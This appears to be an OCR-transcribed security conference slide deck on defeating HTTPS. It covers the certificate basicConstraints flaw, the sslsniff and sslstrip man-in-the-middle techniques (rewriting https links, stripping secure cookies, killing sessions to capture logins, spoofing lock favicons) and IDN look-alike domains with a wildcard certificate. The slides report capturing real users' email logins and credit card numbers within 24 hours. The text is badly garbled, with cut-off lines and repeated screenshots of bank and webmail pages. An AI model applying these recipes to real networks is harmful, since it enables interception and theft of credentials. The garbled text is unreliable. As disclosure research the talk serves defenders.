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This certificate has been verified for the following uses: 


| SSL Server Certificate 




Issued To 




Common Name (CN) 


www.paypal.com 


Organization (0) 


PayPal Inc. 


Organizational Unit (OU) 


Information Systems 


Serial Number 


63:4D:CE:lC:61:9F:FB:6B:2G:lE:05AD:5BA9:85:8e 


Issued By 




Common Name (CN) 


Verisign Class 3 Extended Validation SSL SGC CA 


Organization (0) 


Verisign, Inc. 


Organizational Unit (OU) 


Verisign Trust Network 


Validity 




Issued On 


05/01/2008 


Expires On 


05/02/2009 


Fingerprints 




SHA1 Fingerprint 


A4:25:F6:7E:D2:C9:AC:D6:DE:F6:53:DA:79:5E:01:C5:17:FJ3:75:2D 


MD5 Fingerprint 


22:B7:78:93:7D:BA:56:8B:84:BD:F9A9:74:70:07:00 
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CA Certificate 

Embedded in browser. 

All powerful. 

Certifies that a site certificate is 

authentic. 



Site 



vnS6 \>k ^frfefrtftf based 
on CA Certificate's signature. 



CA Certificate 

Embedded in browser. 
All powerful. 

Certifies that an intermediate 
CA is authentic. 



Intermediate 

^o^ribedded in browser. 
STinsort of all-powerful. 
Certifies that a site certificate is 
authentic. 



Site 



(aedxf'K 

vnS6 \>k ^frfefrtftf based 
on CA Certificate's signature. 



Certificate Chains Can Be > 3 



Root CA 



Intermediate 



Intermediate 



Intermediate! 



What they say: 



Verify that the leaf node has the name of the site 
you're connecting to. 

Verify that the leaf node hasn't expired. 

Check the signature. 

If the signing certificate is in our list of root CA's, 
stop. 

Otherwise, move one up the chain and repeat. 



Here Be Dragons 



Verifying a Certificate Chain to the Root CA 



V*lf)rvall*v parked md vtmfy Ihnl Ihis 
is signftd by Ih* ratt CA. BbCuusA lb* 
rOM CAislrusMd, varaHon slops hs*n. 



VAflfjrvdlAr period wd vtatty Ihnt Ihis 
isiigrtfd bf CAOno. Bacons* CA On* is I 
nM IruslAd, 1ha ntal cnrtHkato is checked. I 



V*frf* vMWy pa-lod trt WPtt) 1 &141 ttllti 
is SiprtKl by CA TWft. B«5njJS£ GATWO 
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Very tempting to use a 
simple recursive 
function. 

Everyone focuses on the 
signature validation. 

The result of a naive 
attempt at validation is 
a chain that is complete, 
but nothing more. 



What if... 



Intermediate 



Intermediate I 



What if... 



Intermediate 



Intermediate I 



Leaf 

|(blueanarchy| 

■org) 



What they say: 



Verify that the leaf node has the name of the site 
you're connecting to. 

Verify that the leaf node hasn't expired. 

Check the signature. 

If the signing certificate is in our list of root CA's, 
stop. 

Otherwise, move one up the chain and repeat. 



Something must be wrong, but. 



All the signatures are valid. 

Nothing has expired. 

The chain is in tact. 

The root CA is embedded in the browser and 
trusted. 



But we just created a valid 
certificate for PayPal, and we're not 

PayPal? 



...is a somewhat obscure field. 



File Edit View Terminal Tabs Help 
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Back In The Day 



Most CA's didn't explicitly set basicConstraints: 
CA= FALSE 

A lot of web browsers and other SSL 
implementations didn't bother to check it, whether 
the field was there or not. 

Anyone with a valid leaf node certificate could 
create and sign a leaf node certificate for any 
other domain. 

When presented with the complete chain, IE, 
Konqueror, OpenSSL, and others considered it 
valid. 



And then in 2002... 



Microsoft did something particularly annoying, and 
I blew this up by publishing it. 

Microsoft claimed that it was impossible to exploit. 

So I also published a tool that exploits it. 



sslsniff 




Client Side: 

Intercepts HTTPS traffic. 

Generates a certificate for the 

site the client is connecting 

to. 

Signs that with whatever 

certificate you specify. 

Proxies data through. 



Server Side: 

Makes normal HTTPS 
connection to the server. 
Sends and receives data 
as if it's a normal client. 



sslsniff 




Back before people started checking BasicConstraints: 

All you had to do was pass sslsniff a valid leaf node certificate for any domain. 

It would automatically generate a certificate for the domain the client was connecting to 

on the fly. 

It would sign that certificate with the leaf node. 

IE, Konqueror, etc... wouldn't notice the difference. 



sslsniff post-disclosure 



You'd be surprised who still doesn't check basic 
constraints. 

Even when people got warning dialogs in browsers 
that had been fixed, most of the time they'd just 
click through them. 

Still useful as a general MITM tool for SSL. 

The folks who did the MD5 hash collision stuff 
used sslsniff to hijack connections once they'd 
gotten a CA cert. 

There are other uses yet, to be disclosed another 



The things you learn in TV studios. 








Learn more 



Enter Online ID: 



□ Save this Online ID 
Password: 



Where do I enter my 
Passcode? 



You Privacy ft Secixity 

Report suspicious email 
Norton 360 - Free Trial 



issusa 



Products & Services 


Manage Your Accounts 


Achieve Your Goals 


Checking 


Fees and processes 


Keep the Change® 


Savings & CDs 


Order Check Card 


Buying a home 


Credit cards 


Online Investing 


Searching for a home 


Mortgage 




Retirement Center 


Refinance 


Online Banking > 


Planning for college 


Home equity 


Viewing your accounts 


Student loans 


Auto loans 


Accessing credit cards 


Purchasing a car 



IRAs 

Investment Services 



Bill Pay 

Tracking your expenses 



Consolidating debt 
Small Business Online 
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■# ivious ^Next Highlight all □ Match case 



The things you learn in TV studios. 
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File Edit View History Bookmarks Tools Help 
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Bank of America 



Locations • Contact Us • Help • Sign In * En Espahol 




Easy. Secure. Free. 



Learn more 



Enter Online ID: 



□ Save this Online ID 
Password: 



You Privacy & Seen ity 

Report suspicious email 
Norton 360 - Free Trial 



K Find: 



You've served our country. 

Now it's our privilege to serve you. 

Military Banking accounts from Bank of America. 

Convenient, secure banking wherever you are. 
Military Banking fram Bank of America. 




Products & Services Manage Your Accounts Achieve Your Goals 




Checking 

Savings & CDs 

Credit cards 

Mortgage 

Refinance 

Home equity 

Auto loans 

IRAs 

Investment Services 



F^s and processes 
Order Cheek Card 
Online Investing 

Online Banking > 

Viewing your accounts 
Accessing credit cards 
Bill Pay 
Tracking your expenses 



Keep the Change® 
Buying a home 
Searching for a home 
Retirement Center 
Planning for college 
Student loans 
Purchasing a car 
Consolidating debt 
Small Business Online 
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^Previous 4*Next Highlight all □ Match case 



The things you learn in TV studios. 





File Edit View History Bookmarks Tools Help 
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Bank of America 



Locations • Contact Us • Help • Sign In * En Espahol 



Enter Online ID: 



□ Save this Online ID 
Password: 



You Privacy & Secuity 

Report suspicious email 
Norton 360 - Free Trial 



K Find: 




You've served our country. 

Now it's our privilege to serve you. 

Military Banking accounts from Bank of America. 

Convenient, secure backing wherever you are. 
Miftaiy Banking fram Bank of America. 




Products & Services Manage Your Accounts Achieve Your Goals 



Checking 

Savings & CDs 

Credit cards 

Mortgage 

Refinance 

Home equity 

Auto loans 

IRAs 

Investment Services 



F^s and processes 
Order Cheek Card 
Online Investing 

Online Banking > 

Viewing your accounts 
Accessing credit cards 
Bill Pay 
Tracking your expenses 



Keep the Change® 
Buying a home 
Searching for a home 
Retirement Center 
Planning for college 
Student loans 
Purchasing a car 
Consolidating debt 
Small Business Online 
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^Previous 4*Next Highlight all □ Match case 



The things you learn in TV studios. 



Easy. Secure. Fre 



□ Save this Online ID 
Password: 



This button posts to an HTTPS link, but there's no way to 
know that. 

It's a button, so if you mouse-over it, the link isn't displayed 
in the browser bar at the bottom. 

The best you could do would be to view the page source, 
but that's problematic in browsers like Firefox that issue a 
second request to the server for the source. 



Still prevalent today... 



j File Edit View History Bookmarks Tools Help 
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Customer Service j Contact Us ; Locations 



! WACHOVIA 




The time is now. 

Mortgage rates are ai an all-time low. 

Refinance today and save. 



D Remember my User ID 
Password: 

I 

(case sensitive) 

Service: 

Choose a service... ▼ | 



F- 'I • I' f i J I "• ■! i _ _ J 



Online Secirily 

Wachovia Security Plus 5M 
Online Services Gu.h i •:.■■ 



Sign Up for Online Banking 

•M-;)i'i Up Lr-xrni.ivrv Nio 



LtHATlnNS 



More Search 



Personal Finance 

Online Services 

1 (in I'll fclilf- i 

Mobile Banking 
Online Brokerage 
More... 
Retirement Planning 

Tools & information for 
Lifetime Retirement Planning 
Investing 

Accounts & Services 

IRAs 

More... 

Insuance 

Life, Auto, Home, 
Health 



Refers Friend 

It adds up to $25 for both 
Of you. 



Banking 

Checking 
Savings £ CDs 
Credit Cards 
Check Cards 
More... 
Lending 
Mortgage 

Home Equity' New 
Education Loans 
Vehicle Loans 



Mortgage Rates 
Home Equity Rates 
Credit Card Rates 

Payment Challenges? 

Explore your loan options 



Ready to get organized*; 

It's easier than you think. 



G-a Paperlass Q3 



| Done 



STRENGTH AND STABILITY 



Wachovia is now 

part of Wells Fargo. 



Wachovia Siuimms 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 

■■ '■•• 'I - F' : " !ii- ..'ii!!!:- 



Still prevalent today... 
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File Edit View History Bookmarks Tools Help 
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' Windows Live 



One Windows Live ID gets you into Hotmail. Messenger, Kb ox LIVE — and other places you see ty 



U Powerful Microsofttechnology 
helps fight spam and improve 
security. 

1} Get more done thanks to greater 
ease and speed. 

fjjP Lots of storage (5 GBj -more cool 
stuff on the way. 



Sign in 

^■Windows Live ID: T 



(example55 5@hotmail.com) 



Learn more 



Don't have a Windows Live ID? 



| Signup^ 



Forgot your password? 

[7] Remember me on this 

computer (?) 
CD Remember my password (?) 



e enhanced security 



Then: A Positive Feedback System 



A number of indicators deployed to designate that 
a page is secure. 

A proliferation of little lock icons. 

URL bars that turn gold. 



Then: An example from Firefox 2 
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^XHOOf £ ,MAIL 



Your Inbox understands you've got news to share. 



l^Jta See which of your contacts are online at a glance . 
. S'-ij Easily switch from email to chat and back again. 
"^^ start ri 9 nt away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo! -Blag- Help 




I Dune 



Sign in to Yahoo! 







£ 


Are you protected? 

Create your sign-in seal. 
(Why?) 







(e.g. free2rhyme@yahoo.com) 



|~ Keep me signed in 

for 2 weeks unless I sign out. Ir ™ 
[Uncheck if on a shared computer] 



Forget your ID or password? | Help 

Don't have a Yahoo! ID? 

Signing up is easy. 

Sign Up 

i as j Tor Disabled I FoxyProxy: Disal 



I login.yahoi 



Then: An example from Firefox 2 
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^XHOOf £ ,MAIL 



Your Inbox understands you've got news to share. 



l^Jta See which of your contacts are online at a glance . 
. S'-ij Easily switch from email to chat and back again. 
"^^ start ri 9 nt away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



Yahoo! -Blag- Help 




I Done 



Sign in to Yahoo! 







£ 


Are you protected? 

Create your sign-in seal. 
(Why?) 







(e.g. free2rhyme@yahoo.com) 



|~ Keep me signed in 

for 2 weeks unless I sign out. Ir ™ 
[Uncheck if on a shared computer] 



Forget your ID or password? | Help 

Don't have a Yahoo! ID? 

Signing up is easy. 

Sign Up 

i as j Tor Disabled I FoxyProxy: Disal 



I login.yahoi 



Then: An example from Firefox 2 



P— --— - -^ 
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HH&|G°°gie 



BS- 



m 



SB, 



riseup.net pro 
alternatives ai 



mail.r 
We prt 
access 
mail . L 



hostir 
Riseuf 
that wf 
some f 



help.r 
Our ex 



Unable to verify the identity of admin.riseup.net as a trusted site. 
Possible reasons for this error: 

- Your browser does not recognize the Certificate Authority that issued the site's 
certificate. 

- The site's certificate is incomplete due to a server misconfiguration. 

- You are connected to a site pretending to be admin.riseup.net, possibly to 
obtain your confidential information. 

Please notify the site's webmaster about this problem. 

Before accepting this certificate, you should examine this site's certificate 
carefully. Are you willing to to accept this certificate for the purpose of identifying 
the Web site admin.riseup.net? 

Examine Certificate... 



O Accept this certificate permanently 

® Accept this certificate temporarily for this session 

O Do not accept this certificate and do not connect to this Web site 

Cancel 



security , SSL certificates , mail client tutorials , viruses , and spam . Or, if you don't find what you are looking for, fill 
out a help ticket , and we will get back to you as soon as we are able. 



about us 



d 



I Tor Disabled I FoxyProxy: Disabled 



Connected to www.riseup.net.. 



Then: An example from Firefox 2 
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HH&|G°°gie 



BS- 



m 



SB, 



riseup.net pro 
alternatives ai 



mail.r 
We prt 
access 
mail . L 



hostir 
Riseur. 
that wf 
some f 



help.r 
Our ex 



Unable to verify the identity of admin.riseup.net as a trusted site. 
Possible reasons for this error: 

- Your browser does not recognize the Certificate Authority that issued the site's 
certificate. 

- The site's certificate is incomplete due to a server misconfiguration. 

- You are connected to a site pretending to be admin.riseup.net, possibly to 
obtain your confidential information. 

Please notify the site's webmaster about this problem. 

Before accepting this certificate, you should examine this site's certificate 
carefully. Are you willing to to accept this certificate for the purpose of identifying 
the Web site admin.riseup.net? 

Examine Certificate... 



O Accept this certificate permanently 

® Accept this certificate temporarily for this session 

O Do not accept this certificate and do not connect to this Web site 

Cancel 



security , SSL certificates , mail client tutorials , viruses , and spam . Or, if you don't find what you are looking for, fill 
out a help ticket , and we will get back to you as soon as we are able. 



I Connectedtowww.riseup.net.. 



d 



I Tor Disabled I FoxyProxy: Disabled 



Now: A Negative Feedback System 



Less emphasis on sites being secure. 

The proliferation of little locks has been toned 
down. 

Firefox's gold bar is gone. 

More emphasis on alerting users to problems. 

A maze of hoops that users have to jump through 
in order to access sites with certificates that aren't 
signed by a CA. 



Now: An example from Firefox 3 
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Your Inbox understands you've got news to share. 



£* 



See which of your contacts are online at a glance. 



"*-i Easily switch from email to chat and back again. 



'^^ Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



I Done 



Don't have a 
Yahoo! ID? 

Signing up is easy. 



Sign up for Yahoo! 



Already have a Yahoo! ID? 

Sign in. 



£ 



Are you protected? 

Create your sign-in seal. 
(Why?) 



[ e . g . 1 re e2 rhym e@yah a < 



G Keep me signed in 

for 2 weeks unless I sign out. n ° 
[Uncheck if on a shared computer] 



Sign In | 



I login.yahoo.com £j, 



Now: An example from Firefox 3 



File Edit View History Bookmarks Tools Help 
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Your Inbox understands you've got news to share. 



£* 



See which of your contacts are online at a glance. 



"'■I Easily switch from email to chat and back again. 



'^^ Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



I Done 



Already have a Yahoo! ID? 

Sign in. 



£ 



Are you protected? 

Create your sign-in seal. 
(Why?) 



[ e . g . fre e2 rhym e@yah a < 



G Keep me signed in 

for 2 weeks unless I sign out. n ° 
[Uncheck if on a shared computer] 



Sign In | 



I login.yahoo.com £j, 



Now: An example from Firefox 3 
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Your Inbox understands you've got news to share. 



£* 



See which of your contacts are online at a glance. 



"'■I Easily switch from email to chat and back again. 



'^^ Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



I Done 



Already have a Yahoo! ID? 

Sign in. 



£ 



Are you protected? 

Create your sign-in seal. 
(Why?) 



[ e . g . fre e2 rhym e@yah a < 



G Keep me signed in 

for 2 weeks unless I sign out. n ° 
[Uncheck if on a shared computer] 



Sign In | 



I login.yahoo.com £j, 



Now: An example from Firefox 3 
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Your Inbox understands you've got news to share. 



£* 



See which of your contacts are online at a glance. 



"'■I Easily switch from email to chat and back again. 



'^^ Start right away, no download or setup needed. 



See how to instantly reach friends and family from the New Yahoo! Mail. 



I Done 



Already have a Yahoo! ID? 

Sign in. 



£ 



Are you protected? 

Create your sign-in seal. 
(Why?) 



[ e . g . fre e2 rhym e@yah a < 



G Keep me signed in 

for 2 weeks unless I sign out. n ° 
[Uncheck if on a shared computer] 



Sign In | 



I login.yahoo.com ^ 



Now: An example from Firefox 3 
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https://www.riseup.net/ 
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« | Secure Connection Failed 

www.riseup.net uses an invalid security certificate. 



Sj 



The certificate is not trusted because the issuer certificate is unknown. 
The certificate is only valid for admin.riseup.net 

(Error code: sec_error_unknown_issuer) 



■ This could be a problem with the server's configuration, or it could be 
someone trying to impersonate the server. 

■ If you have connected to this server successfully in the past the error 
may be temporary, and you can try again later. 



Or you can add an exception.. 



:□! 



Now: An example from IE 



Certificate Ei 01 Navigation Blocked 






There is a problem with this website's security certificate. 

The security certificate presented by this website was not issued by a trusted certificate 

authority. 

The security certificate presented by this website was issued for a different website's address. 



We recommend that you close this webpage and do not continue to this website. 

© Click here to dose this webpage. 

@ Continue to this website (not recommended). 

© More information 



Conclusions 



If we trigger the negative feedback, we're 
screwed. 

If we fail to trigger the positive feedback, it's not 
so bad. 



People generally encounter SSL 
in only two ways: 

Clicking on links. 
Through 302's. 



Which means that people only 
encounter SSL through HTTP... 



Remember: 

SSL is normally encountered in one of two ways. 

By clicking on links. 
Through 302 redirects. 



We can attack both of those points through a 
HTTP MITM. 



A First Cut Recipe: sslstrip 






tch <a href="https://..."> to <a href="http://..."> and keep a map of 

it's changed. 

tch Location: https://... to Location: http://... and keep a map of what's 

nged. 



A First Cut Recipe: sslstrip 






en we see an HTTP request for a URL that we've stripped, proxy that 
as HTTPS to the server. 

tch the HTTPS traffic go by, log everything if we want, and keep a ma| 
he relative links, CSS links, and JavaScript links that go by. 



A First Cut Recipe: sslstrip 






The Result: 



server never k 



client doesn't display any of the disastrous warnings that we want to 



see all the traffic. 



Secure Site 
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Gsdil 



Welcome to Gmail 



bA.Vyk- 



A Google approach to email. 



Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290.461681 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 



Username:^ 
Password: \ 






r~J Remember me on this 
computer. 
Sign in | 



I cannot access 



Sign up for Gmail 

About Gmail New features! 



©2009 Google - Gmail for Organize log Terms - Help 



| Done 



| www.google.com ^ | 



Secure Site 
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Welcome to Gmail 



hytirt^L 



A Google approach to email. 



Gmail is 
efficient, 



d? 



a new kind of wen mail, built on the id^ uiv;-j -iri.iil can be more intuitive, 
and useful. And maybe even fun. After all, Gmail has: 

Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290.462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 



Username:P 
Password: \ 






[~J Remember me on this 
computer. 
Sign in | 

I cannot access my account 



Sign up for Gmail 

About Gmail New features! 



i ■ 



| Done 



T 



Secure Site 
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Gmail: Email from Google 
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Vjt— I "'- Welcome to Gmail 



A Google approach to email. 
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Mobile access 

Read Gmail on your mobile phone by pointing your phone's web b 



rta htip:Mgmail.comyapp. 



Lots of space 

Over 7295.652389 megabytes (and counting) of free storage so you'll never need to delete another 
message. 



Sign in to Gmail with your 

Google Account 



Usemame: | 
Password: 



r^| Remember me on this 
computer. 



Sign up for Gmail 

About Gmail New features? 
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Secure Site 
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A Google approach to email. 
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Mobile access 

Read Gmail on your mobile phone by pointing your phone's web bi 



rto http:Wgmail.comyapp. 



Lots of space 

Over 7295.653389 megabytes (and counting) of free storage so you'll never need to delete another 
message. 



Sign in to Gmail with your 

Google Account 



Usemame: 
Password: 



'_' Remember me on this 
computer. 



Sign up for Gmail 

About Gmail New features; 
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What else can we do? 



We've managed to avoid the negative feedback, 
but some positive feedback would be good too. 

People seem to like the little lock icon thing, so it'd 
be nice if we could get that in there too. 



A 1.5 Cut: sslstrip 



[ml 

( J 

r — i 







A new trick: 



s do everything 



e see a favicon request for a URL that we've stripped, we'll send back 
con of our choosing instead. 



Once again, a secure site: 
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Welcome to Gmail 
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A Google approach to email. 



Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290.461681 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 



Username:^ 
Password: \ 






r~J Remember me on this 
computer. 
Sign in | 



I cannot access 



Sign up for Gmail 

About Gmail New features! 
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| Done 



| www.google.com ^ | 



Once again, a secure site: 
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Welcome to Gmail 
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A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290.462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 

Username: 



o 



Password : | 

fj Remember me on this 
computer. 
Sign in | 

I cannot access my account 



Sign up for Gmail 

About Gmail New features! 
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| Done 



T 



We've avoided the negative feedback of 

Hpath 
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J https://www.riseup.net/ 
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H = Secure Connection Failed 

^ m I www.riseup.net uses an invalid security certificate. 



The certificate is not trusted because the issuer certificate is unknown. 
The certificate is only valid for admin.riseup.net 

(Error code: sec_error_unknown_issuer) 



■ This could be a problem with the server's configuration, or it could be 
someone trying to impersonate the server. 

■ If you have connected to this server successfully in the past the error 
may be temporary, and you can try again later. 



Or you can add an exception.. 



I Done 



r 



We can do a subtle MITM via HTTP. 



- X 
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A Google approach to email. 



Grnail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http:Mgmail.com/app. Learn more 

Lots of space 

Over 7290.462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 






Sign in to Gmail with your 

Google Account 

Usemame:] 
Password : | 

Q Remember me on this 
computer. 
Sign in | 

I cannot access my account 



Sign up for Gmail 

About Gmail New features! 



■ 



| Done 



And if we want we can throw in a little lock 
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A Google approach to email. 

Gmail is a new kind of webmail, built on the idea that email can be more intuitive, 
efficient, and useful. And maybe even fun. After all, Gmail has: 



Less spam 

Keep unwanted messages out of your inbox with Google's 
innovative technology. 

Mobile access 

Read Gmail on your mobile phone by pointing your phone's web 
browser to http://gmail.com/app. Learn more 

Lots of space 

Over 7290.462157 megabytes (and counting) of free storage so 
you'll never need to delete another message. 



Sign in to Gmail with your 

Google Account 

Username: 



o 



Password : | 

fj Remember me on this 
computer. 
Sign in | 

I cannot access my account 



Sign up for Gmail 

About Gmail New features! 
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| Done 



T 



Some sites provide no visible 
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! WACHOVIA 




The time is now. 

Mortgage rates are ai an all-time low. 

Refinance today and save. 



D Remember my User ID 
Password: 

I 

(case sensitive) 

Service: 

Choose a service... ▼ | 
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Online Secirily 

Wachovia Security Plus 5M 
Online Services Gu.h i •:.■■ 



Sign Up for Online Banking 
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More Search 



Personal Finance 

Online Services 

1 (in I'll fclilf- i 

Mobile Banking 
Online Brokerage 
More... 
Retirement Planning 

Tools & information for 
Lifetime Retirement Planning 
Investing 

Accounts & Services 

IRAs 

More... 

Insuance 

Life, Auto, Home, 
Health 



Refers Friend 

It adds up to $25 for both 
Of you. 



Banking 

Checking 
Savings £ CDs 
Credit Cards 
Check Cards 
More... 
Lending 
Mortgage 

Home Equity' New 
Education Loans 
Vehicle Loans 



Mortgage Rates 
Home Equity Rates 
Credit Card Rates 

Payment Challenges? 

Explore your loan options 



Ready to get organized*; 

It's easier than you think. 



G-a Paperlass Q3 



| Done 



STRENGTH AND STABILITY 



Wachovia is now 

part of Wells Fargo. 



Wachovia Siuimms 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 
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Some sites provide no visible 
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I WACHOVIA 




Login ® 



LJ Remember my User ID 
Password: 

I 

(case sensitive) 

Service: 

Choose a service... T 
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Retirement Plan Participants: Login 
Education Loan Customers: Login 



Online Secixity 

Wachovia Security Plus 5M 
Online Services Guarantee 



Sign Up for Online Banking 

•"■kin Up L^xrni.ivrv Pern:- 



Locations 



More Search Options 



| Done 



Personal Finance 

Online Services 

uiii Banking with BillPay 
Mobile Banking 
Online Brokerage 
More... 

Retirement Planning 
Tools & information for 
Lifetime Retirement Planning 
Investing 

Accounts & Services 
IRAs 
More... 

Insuance 

Life, Auto, Home, 
Health 



Refers Friend 

It adds up to $25 for both 
Of you. 



The time is now. 

Mortgage rates are al an all-lime low. 

Refinance today and save. 



Banking 

Checking 
Savings & CDs 
Credit Cards 
Check Cards 
More... 
Lending 
Mortgage 

Home Equity New! 
Education Loans 
Vehicle Loans 

Rates 

Mortgage Rates 
Home Equity Rates 
Credit Card Rates 

Payment Challenges? 

Explore your loan options 

Ready to get organized? 

It's easier than you think. 

Go Paperless EX3 



STRENGTH AND STABILITY 



Wachovia is now 

part of Wells Fargo. 
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WAlHnVIA SlUikllllS 

An industry leader in investment and 
advisory services for individuals, 
corporations and institutions. 



Small Business 

The tools, services, and research to 
manage your company. 
Small Business Login 

ONLINE BANKING. 

Securely manage your business 
finances online. 
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The sites themselves confuse us 




A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc..) 

Secure cookies won't get sent over HTTP that's 
been stripped of SSL. 

Cached pages that don't give us a chance to swap 
out their links. 



A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc..) 

Secure cookies won't get sent over HTTP that's 
been stripped of SSL. 

Cached pages that don't give us a chance to swap 
out their links. 

A Simple Solution 

Strip all that stuff too. 

Kill the secure bit on Set-Cookie statements, strip 
the content encodings we don't like from client 
requests, and strip if-modified-since headers too. 



Another problem: sessions 



The most interesting stuff to log are POSTs that 
would have been sent via SSL. 

Particularly, usernames/passwords. 

Sessions often cause us to miss the login step, 
which is unfortunate. 

Sure, we can get the session cookie, but that's 
small change. 



And a little less sketchy... 

Sessions expire, and it's not always clear when or why, 
but they don't usually expire right in the middle of an 
active session. So what we do now: 



When we start a MITM against a network, strip all 
the traffic immediately, but don't touch the 
cookies for 5 min (or some specified length of 
time). 

As the cookies go by, make note of the active 
sessions. 

After the time is up, start killing sessions, but only 
new sessions that we haven't seen before. These 
should be the "long running" sessions that won't 
be seen as suspicious should they disappear. 



Some Results Of This Trick? 



login.yahoo.com 114 
Gmail 50 

ticketmaster.com 42 
rapidshare.com 14 
Hotmail 13 

paypal.com 9 

linkedin.com 9 
facebook.com 3 



In 24 Hours 



117 email accounts. 

16 credit card numbers. 

7 paypal logins. 

Over 300 other miscellaneous secure logins. 



Combining this technique with homograph 

attacks. 



Standard homograph attack: 

Sometimes the glphys of different characters look 
alike. PayPal.com looks like paypal.com but is 
really paypai.com 

Made more interesting by IDN. It became possible 
to register a domain with characters that appear 
identical to the glyphs of characters in the Latin 
character set. 

In 2005, Ericjohanson registered 
p&#1072;ypal.com, which uses the Cryllic 'a' look- 
alike character and displays as paypal.com 



Combining this technique with homograph 

attacks. 



What I don't like about the standard attack: 

The attack vector has to be targeted. By 
registering p&#1072;ypal.com, all we can attack 
is paypal.com 

Phishing is really just too much work. It'd be nicer 
if we could just MITM a network and get whatever 
people are doing. 

The IDN stuff has been fixed. ForTLDs like .com, 
Firefox renders the IDN characters as punycode 
both in the URL bar and the status bar. 



p&#1072;ypal.com today 
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This website is hosted by 3ric Johanson. More information can be found Here . 
Also., if you happen to work for paypal, please get in touch with me. I'd like to give 
you your trademarked domain name back., please... 



| Done 



So how can we reinvent this to attack 

SSL? 

We can't use .com or any TLD that Firefox will 
render into punycode. 

We want something that we can generalize, not 
just a simple substitution for some particular 
character in a domain. 

So, what's in most URLs? . / & ? 



one trick 



Register a domain like ijjk.cn 

Get a domain-validated SSL wildcard cert for 
*. ijjk.cn 

Use IDN-valid characters that look very similar to 
'/' and '?' to create false URLs. 

MITM HTTP and swap out the HTTPS links as usual. 

But this time, instead of just stripping the HTTPS 
links, we swap them out for our own look-alikes. 



one trick 



becomes 

The latter does not display as punycode in the 
status bar or the URL bar. 

When resolved, it becomes www.google.xn- 
comaccountsservicelogin-5j9pia.f.ijjk.cn 

When we MITM these connections, we do SSL on 
both ends, but are able to present our own valid 
*. ijjk.cn cert to the client. 



Here We Go 



Request 



302 for the same URL, 
but with Set-Cookie: 
headers that expire all 
the cookies we got 
from the request. 



Request Again 
(Sans-Cookies) 



Proxy HTTP back, and 
swap out all the HTTPS 
links for our own look- 
alike HTTPS links. 



SSL request for a look- 
alike domain that we 



s 



Proxy data back from 
the actual domain. 



An Example 



j^J_eJ.Xjl 
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SECURITY ASSURANCE LOCATE FNC CONTACT US CUSTOMER 5ERV 
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rUIV* PNC Bank is participating in the 

I FDIC's Transaction Account 

^^^* Guarantee Program, more ► 



Two of America's 
best-known banks. 
Now simply one of 
America's best 



eacv a.-; possible for you. 



PNC's wide range of services can make 
banking easier, and more convenient 
than ever. See why PNC's the smart 
choice for help in meeting yourfinancial 
goals. 



t Online Banking and Bill Pay 

► Checking 

► Savings 

► Loans and Lines of Credit 

► Cards 



PNC Bank Select Reward 
Visa * Platinum Car 

Take advantage of a 0.99° 

Introductory APR throug 

March 31, 2010 o 

la la nee Transfer* 

Mfftttore 



Whatever challenges and opportunities | 
lie ahead, PNC can help. See why 
working with PNC to plan for life's 
greatest milestones is the smart 
choice. 

► Making the Most of Your Money 

► Virtual Wallet 

► Planning for Retirement 

► Saving for Education 

► Buying a Home 
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An Example 
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Important FDIC Information 

PI K E-xnl b participating in the 
FDIC's Transaction Account 
Guarantee Program, more ► 



Two of America's 
best-known banks. 
Now simply one of 
America's best 
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eacv a.-; possible for you. 



PNC's wide range of services can make 
banking easier, and more convenient 
than ever. See why PNC's the smart 
choice for help in meeting yourfinancial 
goals. 

► Online Banking and Bill Pay 

► Checking 

► Savings 

* Loans and Lines of Credit 

► Cards 



Whatever challenges and opportunities 
lie ahead, PNC can help. See why 
working with PNC to plan for life's 
greatest milestones is the smart 
choice. 

► Making the Most of Your Money 

► Virtual Wallet 

► Planning for Retirement 

► Saving for Education 
* Buying a Home 
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Nice thing about this... 



Happens in real-time. 

Generalized: 

Targets whatever secure sites people are 
browsing to at any moment. 

Doesn't require multiple certificates or 
restricting ourselves to popular sites. 

Once we get a secure POST, we can switch them 
back to a normal traffic stream. 



Lessons... 



